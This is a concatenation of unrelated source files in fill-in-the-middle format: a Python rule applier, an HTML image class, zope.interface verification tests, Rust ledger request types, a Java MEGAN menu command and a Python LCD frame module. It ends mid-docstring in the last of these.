return data
def apply_rule(self, rule):
    """Execute one rule: single rules run the plugin chain, groups recurse."""
    # Function-call form of print is valid under both Python 2 and Python 3;
    # the old `print 'x'` statement is a syntax error on Python 3.
    print('Applying {0}'.format(rule['rule_name']))
    if rule['rule_type'] == 'single':
        rule['action'] = self.expand_action(rule['action'])
        data = self.apply_rule_ingress(rule)
        data = self.apply_data_processors(rule, data)
        self.apply_rule_egress(rule, data)
    else:
        for child_rule_name in rule['members']:
            self.apply_rule_by_name(child_rule_name)
def apply_rule_by_name(self, rule_name):
    """Look up a rule by name and apply it; abort the program if absent."""
    match = next((r for r in self if r['rule_name'] == rule_name), None)
    if match is None:
        sys.exit('Error! Rule not found')
    self.apply_rule(match)
def apply_rules(self):
    """Apply every rule whose 'active' flag is truthy, in list order."""
    for rule in (r for r in self if r['active']):
        self.apply_rule(rule)
self.load()
self.filter_recursion() |
<|file_name|>image.py<|end_file_name|><|fim▁begin|>from .attribute import html_attribute
from .element import VoidElement
class Image(VoidElement):
    """An HTML image (<img>) element.

    Images must have an alternate text description that describes the
    contents of the image, if the image can not be displayed. In some
    cases the alternate text can be empty. For example, if the image just
    displays a company logo next to the company's name or if the image just
    adds an icon next to a textual description of an action.

    Example:

        >>> image = Image("whiteboard.jpg",
        ...               "A whiteboard filled with mathematical formulas.")
        >>> image.title = "Whiteboards are a useful tool"

    """

    # Descriptors mapping Python attribute access to HTML attributes.
    url = html_attribute("src")
    alternate_text = html_attribute("alt")
    title = html_attribute("title")

    def __init__(self, url, alternate_text=""):
        super().__init__("img")
        self.url = url
        self.alternate_text = alternate_text
<|file_name|>test_verify.py<|end_file_name|><|fim▁begin|>##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
""" zope.interface.verify unit tests
"""
import unittest
# pylint:disable=inherit-non-class,no-method-argument,no-self-argument
class Test_verifyClass(unittest.TestCase):
verifier = None
def setUp(self):
self.verifier = self._get_FUT()
@classmethod
def _get_FUT(cls):
from zope.interface.verify import verifyClass
return verifyClass
_adjust_object_before_verify = lambda self, x: x
def _callFUT(self, iface, klass, **kwargs):
return self.verifier(iface,
self._adjust_object_before_verify(klass),
**kwargs)
def test_class_doesnt_implement(self):
from zope.interface import Interface
from zope.interface.exceptions import DoesNotImplement
class ICurrent(Interface):
pass
class Current(object):
pass
self.assertRaises(DoesNotImplement, self._callFUT, ICurrent, Current)
def test_class_doesnt_implement_but_classImplements_later(self):
from zope.interface import Interface
from zope.interface import classImplements
class ICurrent(Interface):
pass
class Current(object):
pass
classImplements(Current, ICurrent)
self._callFUT(ICurrent, Current)
def test_class_doesnt_have_required_method_simple(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenImplementation
class ICurrent(Interface):
def method():
pass
@implementer(ICurrent)
class Current(object):
pass
self.assertRaises(BrokenImplementation,
self._callFUT, ICurrent, Current)
def test_class_has_required_method_simple(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method():
pass
@implementer(ICurrent)
class Current(object):
def method(self):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_class_doesnt_have_required_method_derived(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenImplementation
class IBase(Interface):
def method():
pass
class IDerived(IBase):
pass
@implementer(IDerived)
class Current(object):
pass
self.assertRaises(BrokenImplementation,
self._callFUT, IDerived, Current)
def test_class_has_required_method_derived(self):
from zope.interface import Interface
from zope.interface import implementer
class IBase(Interface):
def method():
pass
class IDerived(IBase):
pass
@implementer(IDerived)
class Current(object):
def method(self):
raise NotImplementedError()
self._callFUT(IDerived, Current)
def test_method_takes_wrong_arg_names_but_OK(self):
# We no longer require names to match.
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, b):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_not_enough_args(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_doesnt_take_required_starargs(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(*args):
pass
@implementer(ICurrent)
class Current(object):
def method(self):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_doesnt_take_required_only_kwargs(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(**kw):
pass
@implementer(ICurrent)
class Current(object):
def method(self):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_takes_extra_arg(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a, b):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_takes_extra_arg_with_default(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a, b=None):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_only_positional_args(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, *args):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_only_kwargs(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, **kw):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_takes_extra_starargs(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a, *args):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_extra_starargs_and_kwargs(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a, *args, **kw):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_doesnt_take_required_positional_and_starargs(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(a, *args):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_takes_required_positional_and_starargs(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a, *args):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a, *args):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_only_starargs(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a, *args):
pass
@implementer(ICurrent)
class Current(object):
def method(self, *args):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_required_kwargs(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(**kwargs):
pass
@implementer(ICurrent)
class Current(object):
def method(self, **kw):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_positional_plus_required_starargs(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(*args):
pass<|fim▁hole|> @implementer(ICurrent)
class Current(object):
def method(self, a, *args):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_doesnt_take_required_kwargs(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(**kwargs):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_class_has_method_for_iface_attr(self):
from zope.interface import Attribute
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
attr = Attribute("The foo Attribute")
@implementer(ICurrent)
class Current:
def attr(self):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_class_has_nonmethod_for_method(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method():
pass
@implementer(ICurrent)
class Current:
method = 1
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_class_has_attribute_for_attribute(self):
from zope.interface import Attribute
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
attr = Attribute("The foo Attribute")
@implementer(ICurrent)
class Current:
attr = 1
self._callFUT(ICurrent, Current)
def test_class_misses_attribute_for_attribute(self):
# This check *passes* for verifyClass
from zope.interface import Attribute
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
attr = Attribute("The foo Attribute")
@implementer(ICurrent)
class Current:
pass
self._callFUT(ICurrent, Current)
def test_w_callable_non_func_method(self):
from zope.interface.interface import Method
from zope.interface import Interface
from zope.interface import implementer
class QuasiMethod(Method):
def __call__(self, *args, **kw):
raise NotImplementedError()
class QuasiCallable(object):
def __call__(self, *args, **kw):
raise NotImplementedError()
class ICurrent(Interface):
attr = QuasiMethod('This is callable')
@implementer(ICurrent)
class Current:
attr = QuasiCallable()
self._callFUT(ICurrent, Current)
def test_w_decorated_method(self):
from zope.interface import Interface
from zope.interface import implementer
def decorator(func):
# this is, in fact, zope.proxy.non_overridable
return property(lambda self: func.__get__(self))
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
@decorator
def method(self, a):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_dict_IFullMapping(self):
# A dict should be an IFullMapping, but this exposes two
# issues. First, on CPython, methods of builtin types are
# "method_descriptor" objects, and are harder to introspect.
# Second, on PyPy, the signatures can be just plain wrong,
# specifying as required arguments that are actually optional.
# See https://github.com/zopefoundation/zope.interface/issues/118
from zope.interface.common.mapping import IFullMapping
self._callFUT(IFullMapping, dict, tentative=True)
def test_list_ISequence(self):
# As for test_dict_IFullMapping
from zope.interface.common.sequence import ISequence
self._callFUT(ISequence, list, tentative=True)
def test_tuple_IReadSequence(self):
# As for test_dict_IFullMapping
from zope.interface.common.sequence import IReadSequence
self._callFUT(IReadSequence, tuple, tentative=True)
def test_multiple_invalid(self):
from zope.interface.exceptions import MultipleInvalid
from zope.interface.exceptions import DoesNotImplement
from zope.interface.exceptions import BrokenImplementation
from zope.interface import Interface
from zope.interface import classImplements
class ISeveralMethods(Interface):
def meth1(arg1):
"Method 1"
def meth2(arg1):
"Method 2"
class SeveralMethods(object):
pass
with self.assertRaises(MultipleInvalid) as exc:
self._callFUT(ISeveralMethods, SeveralMethods)
ex = exc.exception
self.assertEqual(3, len(ex.exceptions))
self.assertIsInstance(ex.exceptions[0], DoesNotImplement)
self.assertIsInstance(ex.exceptions[1], BrokenImplementation)
self.assertIsInstance(ex.exceptions[2], BrokenImplementation)
# If everything else is correct, only the single error is raised without
# the wrapper.
classImplements(SeveralMethods, ISeveralMethods)
SeveralMethods.meth1 = lambda self, arg1: "Hi"
with self.assertRaises(BrokenImplementation):
self._callFUT(ISeveralMethods, SeveralMethods)
class Test_verifyObject(Test_verifyClass):
    """Runs the whole Test_verifyClass suite against ``verifyObject``.

    _adjust_object_before_verify instantiates the class under test so the
    inherited checks run against an instance; the overrides below cover
    object-only behaviour (missing instance attributes, modules, static
    methods on a providing class).
    """

    @classmethod
    def _get_FUT(cls):
        # Function under test: verifyObject instead of verifyClass.
        from zope.interface.verify import verifyObject
        return verifyObject

    def _adjust_object_before_verify(self, target):
        # Instantiate classes (new-style, or old-style on Python 2) so
        # verifyObject sees an object; other targets (e.g. modules) are
        # passed through unchanged.
        if isinstance(target, (type, type(OldSkool))):
            target = target()
        return target

    def test_class_misses_attribute_for_attribute(self):
        # This check *fails* for verifyObject
        from zope.interface import Attribute
        from zope.interface import Interface
        from zope.interface import implementer
        from zope.interface.exceptions import BrokenImplementation

        class ICurrent(Interface):
            attr = Attribute("The foo Attribute")

        @implementer(ICurrent)
        class Current:
            pass

        self.assertRaises(BrokenImplementation,
                          self._callFUT, ICurrent, Current)

    def test_module_hit(self):
        # A module can declare that it provides an interface.
        from zope.interface.tests.idummy import IDummyModule
        from zope.interface.tests import dummy

        self._callFUT(IDummyModule, dummy)

    def test_module_miss(self):
        from zope.interface import Interface
        from zope.interface.tests import dummy
        from zope.interface.exceptions import DoesNotImplement

        # same name, different object
        class IDummyModule(Interface):
            pass

        self.assertRaises(DoesNotImplement,
                          self._callFUT, IDummyModule, dummy)

    def test_staticmethod_hit_on_class(self):
        from zope.interface import Interface
        from zope.interface import provider
        from zope.interface.verify import verifyObject

        class IFoo(Interface):

            def bar(a, b):
                "The bar method"

        @provider(IFoo)
        class Foo(object):

            @staticmethod
            def bar(a, b):
                raise AssertionError("We're never actually called")

        # Don't use self._callFUT, we don't want to instantiate the
        # class.
        verifyObject(IFoo, Foo)
class OldSkool:
    # Marker class used by Test_verifyObject._adjust_object_before_verify:
    # ``type(OldSkool)`` identifies "classic" classes, which on Python 2 have
    # a different type than ``type``.  NOTE(review): on Python 3 this is just
    # ``type`` again — the distinction only matters for Python 2 runs.
    pass
<|file_name|>types.rs<|end_file_name|><|fim▁begin|>extern crate serde_json;
use services::anoncreds::types::{PublicKey, RevocationPublicKey};
use utils::json::{JsonEncodable, JsonDecodable};
use services::ledger::constants::{
NODE,
NYM,
ATTRIB,
SCHEMA,
GET_ATTR,
GET_DDO,
GET_NYM,
GET_SCHEMA,
CLAIM_DEF,
GET_CLAIM_DEF,
STEWARD,
TRUSTEE,
TRUST_ANCHOR,
GET_TXN
};
#[derive(Serialize, PartialEq, Debug)]
#[serde(rename_all = "camelCase")]
pub struct Request<T: JsonEncodable> {
pub req_id: u64,
pub identifier: String,
pub operation: T,
#[serde(skip_serializing_if = "Option::is_none")]
pub signature: Option<String>
}
impl<T: JsonEncodable> Request<T> {
    /// Build an unsigned request envelope; the signature is attached later.
    pub fn new(req_id: u64, identifier: String, operation: T) -> Request<T> {
        Request {
            req_id,
            identifier,
            operation,
            signature: None,
        }
    }
}
impl<T: JsonEncodable> JsonEncodable for Request<T> {}
#[derive(Deserialize, Serialize, PartialEq, Debug)]
pub enum Role {
Steward = STEWARD,
Trustee = TRUSTEE,
TrustAnchor = TRUST_ANCHOR
}
#[derive(Serialize, PartialEq, Debug)]
pub struct NymOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String,
#[serde(skip_serializing_if = "Option::is_none")]
pub verkey: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub alias: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub role: Option<String>
}
impl NymOperation {
    /// Create a NYM operation targeting `dest`; optional fields are omitted
    /// from the serialized form when `None` (see the struct's serde attrs).
    pub fn new(dest: String, verkey: Option<String>,
               alias: Option<String>, role: Option<String>) -> NymOperation {
        NymOperation {
            _type: NYM.to_string(),
            dest,
            verkey,
            alias,
            role,
        }
    }
}
impl JsonEncodable for NymOperation {}
#[derive(Serialize, PartialEq, Debug)]
pub struct GetNymOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String
}
impl GetNymOperation {
pub fn new(dest: String) -> GetNymOperation {
GetNymOperation {
_type: GET_NYM.to_string(),
dest: dest
}
}
}
impl JsonEncodable for GetNymOperation {}
#[derive(Serialize, PartialEq, Debug)]
pub struct AttribOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String,
#[serde(skip_serializing_if = "Option::is_none")]
pub hash: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub raw: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub enc: Option<String>
}
impl AttribOperation {
pub fn new(dest: String, hash: Option<String>, raw: Option<String>,
enc: Option<String>) -> AttribOperation {
AttribOperation {
_type: ATTRIB.to_string(),
dest: dest,
hash: hash,
raw: raw,
enc: enc,
}
}
}
impl JsonEncodable for AttribOperation {}
#[derive(Serialize, PartialEq, Debug)]
pub struct GetAttribOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String,
pub raw: String
}
impl GetAttribOperation {
pub fn new(dest: String, raw: String) -> GetAttribOperation {
GetAttribOperation {
_type: GET_ATTR.to_string(),
dest: dest,
raw: raw
}
}
}
impl JsonEncodable for GetAttribOperation {}
#[derive(Serialize, PartialEq, Debug)]
pub struct SchemaOperation {
#[serde(rename = "type")]
pub _type: String,
pub data: SchemaOperationData,
}
impl SchemaOperation {
pub fn new(data: SchemaOperationData) -> SchemaOperation {
SchemaOperation {
data: data,
_type: SCHEMA.to_string()
}
}
}
impl JsonEncodable for SchemaOperation {}
#[derive(Serialize, PartialEq, Debug, Deserialize)]
pub struct SchemaOperationData {
name: String,
version: String,
attr_names: Vec<String>
}
impl SchemaOperationData {
    /// Bundle a schema's name, version and attribute names for a SCHEMA txn.
    pub fn new(name: String, version: String, keys: Vec<String>) -> SchemaOperationData {
        SchemaOperationData {
            name,
            version,
            attr_names: keys,
        }
    }
}
impl JsonEncodable for SchemaOperationData {}
impl<'a> JsonDecodable<'a> for SchemaOperationData {}
#[derive(Serialize, PartialEq, Debug)]
pub struct GetSchemaOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String,
pub data: GetSchemaOperationData
}
impl GetSchemaOperation {
pub fn new(dest: String, data: GetSchemaOperationData) -> GetSchemaOperation {
GetSchemaOperation {
_type: GET_SCHEMA.to_string(),
dest: dest,
data: data
}
}
}
impl JsonEncodable for GetSchemaOperation {}
#[derive(Deserialize, PartialEq, Debug)]
#[serde(rename_all = "camelCase")]
pub struct GetSchemaResultData {
pub attr_names: Vec<String>,
pub name: String,
pub origin: String,
pub seq_no: String,
#[serde(rename = "type")]
pub _type: Option<String>,
pub version: String
}
#[derive(Serialize, PartialEq, Debug, Deserialize)]
pub struct GetSchemaOperationData {
pub name: String,
pub version: String
}
impl GetSchemaOperationData {
pub fn new(name: String, version: String) -> GetSchemaOperationData {
GetSchemaOperationData {
name: name,
version: version
}
}
}
impl JsonEncodable for GetSchemaOperationData {}
impl<'a> JsonDecodable<'a> for GetSchemaOperationData {}
#[derive(Serialize, PartialEq, Debug)]
pub struct ClaimDefOperation {
#[serde(rename = "ref")]
pub _ref: i32,
pub data: ClaimDefOperationData,
#[serde(rename = "type")]
pub _type: String,
pub signature_type: String
}
impl ClaimDefOperation {
pub fn new(_ref: i32, signature_type: String, data: ClaimDefOperationData) -> ClaimDefOperation {
ClaimDefOperation {
_ref: _ref,
signature_type: signature_type,
data: data,
_type: CLAIM_DEF.to_string()
}
}
}
impl JsonEncodable for ClaimDefOperation {}
#[derive(Serialize, PartialEq, Debug, Deserialize)]
pub struct ClaimDefOperationData {
pub primary: PublicKey,
#[serde(serialize_with = "empty_map_instead_of_null")] //FIXME
pub revocation: Option<RevocationPublicKey>
}
impl ClaimDefOperationData {
pub fn new(primary: PublicKey, revocation: Option<RevocationPublicKey>) -> ClaimDefOperationData {
ClaimDefOperationData {
primary: primary,
revocation: revocation
}
}
}
//FIXME workaround for ledger: serialize required dictionary as empty instead of using null
extern crate serde;
use self::serde::Serializer;
use self::serde::ser::SerializeMap;
/// Serialize `None` as an empty map (`{}`) instead of `null`.
///
/// Workaround for the ledger, which expects a dictionary-valued field and
/// rejects `null` when the revocation key is absent.
fn empty_map_instead_of_null<S>(x: &Option<RevocationPublicKey>, s: S) -> Result<S::Ok, S::Error>
    where S: Serializer {
    if let &Some(ref x) = x {
        s.serialize_some(&x)
    } else {
        // A SerializeMap started with no length hint and ended immediately
        // emits an empty map.
        s.serialize_map(None)?.end()
    }
}
//FIXME
impl JsonEncodable for ClaimDefOperationData {}
impl<'a> JsonDecodable<'a> for ClaimDefOperationData {}
#[derive(Serialize, PartialEq, Debug)]
pub struct GetClaimDefOperation {
#[serde(rename = "type")]
pub _type: String,
#[serde(rename = "ref")]
pub _ref: i32,
pub signature_type: String,
pub origin: String
}
impl GetClaimDefOperation {
pub fn new(_ref: i32, signature_type: String, origin: String) -> GetClaimDefOperation {
GetClaimDefOperation {
_type: GET_CLAIM_DEF.to_string(),
_ref: _ref,
signature_type: signature_type,
origin: origin
}
}
}
impl JsonEncodable for GetClaimDefOperation {}
#[derive(Serialize, PartialEq, Debug)]
pub struct NodeOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String,
pub data: NodeOperationData
}
impl NodeOperation {
pub fn new(dest: String, data: NodeOperationData) -> NodeOperation {
NodeOperation {
_type: NODE.to_string(),
dest: dest,
data: data
}
}
}
impl JsonEncodable for NodeOperation {}
#[derive(Serialize, PartialEq, Debug, Deserialize)]
pub enum Services {
VALIDATOR,
OBSERVER
}
#[derive(Serialize, PartialEq, Debug, Deserialize)]
pub struct NodeOperationData {
pub node_ip: String,
pub node_port: i32,
pub client_ip: String,
pub client_port: i32,
pub alias: String,
pub services: Vec<Services>
}
impl NodeOperationData {
    /// Collect a validator/observer node's network endpoints and services.
    pub fn new(node_ip: String, node_port: i32, client_ip: String, client_port: i32, alias: String, services: Vec<Services>) -> NodeOperationData {
        NodeOperationData {
            node_ip,
            node_port,
            client_ip,
            client_port,
            alias,
            services,
        }
    }
}
impl JsonEncodable for NodeOperationData {}
impl<'a> JsonDecodable<'a> for NodeOperationData {}
#[derive(Serialize, PartialEq, Debug)]
pub struct GetDdoOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String
}
impl GetDdoOperation {
pub fn new(dest: String) -> GetDdoOperation {
GetDdoOperation {<|fim▁hole|> _type: GET_DDO.to_string(),
dest: dest
}
}
}
impl JsonEncodable for GetDdoOperation {}
#[derive(Serialize, PartialEq, Debug)]
pub struct GetTxnOperation {
#[serde(rename = "type")]
pub _type: String,
pub data: i32
}
impl GetTxnOperation {
pub fn new(data: i32) -> GetTxnOperation {
GetTxnOperation {
_type: GET_TXN.to_string(),
data: data
}
}
}
impl JsonEncodable for GetTxnOperation {}
#[derive(Deserialize, Eq, PartialEq, Debug)]
pub struct Reply<T> {
pub op: String,
pub result: T,
}
impl<'a, T: JsonDecodable<'a>> JsonDecodable<'a> for Reply<T> {}
#[derive(Deserialize, Eq, PartialEq, Debug)]
#[serde(rename_all = "camelCase")]
pub struct GetNymReplyResult {
pub identifier: String,
pub req_id: u64,
#[serde(rename = "type")]
pub _type: String,
pub data: String,
pub dest: String
}
impl<'a> JsonDecodable<'a> for GetNymReplyResult {}
#[derive(Deserialize, Eq, PartialEq, Debug)]
#[serde(rename_all = "camelCase")]
pub struct GetNymResultData {
pub identifier: Option<String>,
pub dest: String,
pub role: Option<String>,
pub verkey: Option<String>
}
impl<'a> JsonDecodable<'a> for GetNymResultData {}<|fim▁end|> | |
<|file_name|>EcologicalIndexEuclideanCommand.java<|end_file_name|><|fim▁begin|>/*
* EcologicalIndexEuclideanCommand.java Copyright (C) 2021. Daniel H. Huson
*
* (Some files contain contributions from other authors, who are then mentioned separately.)
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*/
package megan.clusteranalysis.commands;
import jloda.swing.commands.ICheckBoxCommand;
import jloda.util.parse.NexusStreamParser;
import megan.clusteranalysis.ClusterViewer;
import megan.clusteranalysis.indices.EuclideanDistance;
import javax.swing.*;
import java.awt.event.ActionEvent;
/**
 * method=Euclidean command: switches the cluster viewer's ecological
 * index to the Euclidean distance.
 * Daniel Huson, 6.2010
 */
public class EcologicalIndexEuclideanCommand extends CommandBase implements ICheckBoxCommand {
    /**
     * this is currently selected?
     *
     * @return true if the viewer's active ecological index is Euclidean
     */
    public boolean isSelected() {
        ClusterViewer viewer = getViewer();
        return viewer.getEcologicalIndex().equalsIgnoreCase(EuclideanDistance.NAME);
    }

    /**
     * get the name to be used as a menu label
     *
     * @return name
     */
    public String getName() {
        return "Use Euclidean";
    }

    /**
     * get description to be used as a tool-tip
     *
     * @return description
     */
    public String getDescription() {
        return "Use Euclidean ecological index";
    }

    /**
     * get icon to be used in menu or button
     *
     * @return icon (none for this command)
     */
    public ImageIcon getIcon() {
        return null;
    }

    /**
     * gets the accelerator key to be used in menu
     *
     * @return accelerator key (none for this command)
     */
    public KeyStroke getAcceleratorKey() {
        return null;
    }

    /**
     * action to be performed: issues the "set index" command
     *
     * @param ev the triggering action event (unused)
     */
    public void actionPerformed(ActionEvent ev) {
        execute("set index=" + EuclideanDistance.NAME + ";");
    }

    /**
     * gets the command needed to undo this command
     *
     * @return undo command (not undoable)
     */
    public String getUndo() {
        return null;
    }

    /**
     * is the command currently applicable? Used to set enable state of command
     *
     * @return true, if command can be applied
     */
    public boolean isApplicable() {
        return getViewer().getParentViewer() != null && getViewer().getParentViewer().hasComparableData()
                && getViewer().getParentViewer().getSelectedNodes().size() > 0;
    }

    /**
     * is this a critical command that can only be executed when no other command is running?
     *
     * @return true, if critical
     */
    public boolean isCritical() {
        return true;
    }

    /**
     * parses the given command and executes it
     *
     * @param np parser positioned at the command (no syntax of its own here)
     * @throws java.io.IOException
     */
    public void apply(NexusStreamParser np) throws Exception {
    }

    /**
     * get command-line usage description
     *
     * @return usage (none; handled by the generic "set index" syntax)
     */
    public String getSyntax() {
        return null;
    }
}
<|file_name|>frame.py<|end_file_name|><|fim▁begin|>from collections import deque
from lcdui import common
from lcdui.ui import widget
import array
import time
class Frame(object):
    """A rectangular LCD region hosting widgets at (row, col) positions."""

    def __init__(self, ui):
        self._ui = ui
        # name -> widget object / (row, col) position / column span.
        # AddWidget(), GetWidget(), RemoveWidget() and Paint() all rely on
        # these mappings existing (the original initialization was lost in
        # this copy of the file and is reconstructed here).
        self._widgets = {}
        self._position = {}
        self._span = {}
        self._screen_buffer = ScreenBuffer(self.rows(), self.cols())
        self.onInitialize()

    def BuildWidget(self, widget_cls, name=None, row=0, col=0, span=None, **kwargs):
        """Construct a widget, register it with this frame, and return it.

        When name is None the widget object itself is used as its key.
        """
        widget_obj = widget_cls(self, **kwargs)
        if name is None:
            name = widget_obj
        self.AddWidget(widget_obj, name, row, col, span)
        return widget_obj

    def rows(self):
        """Returns the number of rows in the frame."""
        return self._ui.rows()

    def cols(self):
        """Returns the number of columns in the frame."""
        return self._ui.cols()

    def onInitialize(self):
        """Hook for subclasses; called once at the end of __init__."""
        pass

    def AddWidget(self, widget_obj, name, row=0, col=0, span=None):
        """Adds a widget to the current frame.

        Args:
          widget_obj: the widget to be added
          name: the name of the widget
          row: the row position of the widget
          col: the column position of the widget
          span: the character mask for the widget (or None if no mask)
        """
        self._widgets[name] = widget_obj
        self._position[name] = (row, col)
        self._span[name] = span or max(0, self.cols() - col)

    def GetWidget(self, name):
        """Returns the widget registered under name, or None."""
        return self._widgets.get(name)

    def RemoveWidget(self, name):
        """Removes the widget with the given name."""
        del self._widgets[name]
        del self._position[name]
        del self._span[name]

    def Paint(self):
        """Causes a repaint to happen, updating any internal buffers."""
        # .items() (not Python-2-only .iteritems()) works on both 2 and 3.
        for name, w in self._widgets.items():
            outstr = w.Paint()
            row, col = self._position[name]
            span = self._span[name]
            # NOTE(review): array typecode 'c' exists only on Python 2;
            # under Python 3 this would need 'b'/bytes — confirm target.
            self._screen_buffer.Write(array.array('c', outstr), row, col, span)
        return self._screen_buffer
class TextFrame(Frame):
    """A frame showing an optional underlined title plus lines of text."""

    def __init__(self, ui, title='', lines=None):
        Frame.__init__(self, ui)
        self._title = title
        if lines is None:
            lines = []
        # Kept by reference (matches original behavior); AddLine mutates it.
        self._lines = lines
        self._UpdateText()

    def _UpdateText(self):
        """Rebuild the per-row LineWidgets from the title and line list."""
        lineno = 0
        if self._title:
            # Underscores frame the title and pad it across the full width.
            title_text = '_' + self._title
            lineno = 1
            if len(title_text) < (self.cols() - 1):
                title_text += '_' * (self.cols() - len(title_text) - 1)
            self.BuildWidget(widget.LineWidget, name='line0',
                             row=0, col=0, contents=title_text)
        idx = 0
        # range (not Python-2-only xrange) works on both 2 and 3.
        for lineno in range(lineno, self.rows()):
            if idx < len(self._lines):
                content = self._lines[idx]
            else:
                content = ''
            idx += 1
            # (Removed an unused `line_name` local that shadowed this.)
            self.BuildWidget(widget.LineWidget, 'line%i' % lineno,
                             row=lineno, col=0, contents=content)

    def SetTitle(self, title):
        """Set (or clear) the title line and refresh the display."""
        self._title = title
        self._UpdateText()

    def AddLine(self, line):
        """Append a line of text (stringified) and refresh the display."""
        self._lines.append(str(line))
        self._UpdateText()
class MultiFrame(Frame):
    """A frame that cycles through child frames, each shown for a set time.

    Widgets cannot be attached directly; content comes from the child
